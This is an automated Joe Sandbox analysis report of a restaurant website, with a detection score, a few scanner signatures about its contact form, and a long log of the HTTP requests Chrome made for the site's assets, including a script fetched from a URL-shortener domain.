Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.afghanhayatrestaurant.com.au/

Overview

General Information

Sample URL:https://www.afghanhayatrestaurant.com.au/
Analysis ID:1523123
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
HTML body contains low number of good links
Suspicious form URL found

Classification

  • System is w10x64
  • chrome.exe (PID: 1344 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5428 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1992,i,16327888069713662135,12520818164670430321,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6376 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.afghanhayatrestaurant.com.au/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://www.afghanhayatrestaurant.com.au/Virustotal: Detection: 5%Perma Link
Source: https://www.afghanhayatrestaurant.com.au/contactUsHTTP Parser: Number of links: 0
Source: https://www.afghanhayatrestaurant.com.au/contactUsHTTP Parser: Form action: send_email.php
Source: https://www.afghanhayatrestaurant.com.au/contactUsHTTP Parser: Form action: send_email.php
Source: https://www.afghanhayatrestaurant.com.au/hoursAndLocationHTTP Parser: No favicon
Source: https://www.afghanhayatrestaurant.com.au/hoursAndLocationHTTP Parser: No favicon
Source: https://www.afghanhayatrestaurant.com.au/contactUsHTTP Parser: No <meta name="copyright".. found
Source: https://www.afghanhayatrestaurant.com.au/contactUsHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/vendors/themify-icons/css/themify-icons.css HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.afghanhayatrestaurant.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/vendors/animate/animate.css HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.afghanhayatrestaurant.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/css/custom.css HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.afghanhayatrestaurant.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/css/foodhut.css HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.afghanhayatrestaurant.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /eWD0j3 HTTP/1.1Host: cuturls.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.afghanhayatrestaurant.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/logo.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/cook_lunch.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/cook_dinner.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/cook_dessert.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/cook_breakfast.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/vendors/jquery/jquery-3.4.1.js HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.afghanhayatrestaurant.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /eWD0j3 HTTP/1.1Host: cuturls.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/main.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/assets/css/foodhut.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/vendors/bootstrap/bootstrap.bundle.js HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.afghanhayatrestaurant.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/vendors/bootstrap/bootstrap.affix.js HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.afghanhayatrestaurant.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/vendors/wow/wow.js HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.afghanhayatrestaurant.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/js/foodhut.js HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.afghanhayatrestaurant.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/icon3.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /assets/imgs/cook_lunch.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/logo.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/cook_dessert.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/cook_dinner.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/icon2.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/cook_breakfast.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/vendors/jquery/jquery-3.4.1.js HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/featured-image-01.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/featured-image-04.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/featured-image-02.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/featured-image-03.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/special-menu-3.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/vendors/bootstrap/bootstrap.affix.js HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/vendors/wow/wow.js HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/js/foodhut.js HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/icon3.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/vendors/bootstrap/bootstrap.bundle.js HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/icon2.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/special-menu-1.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
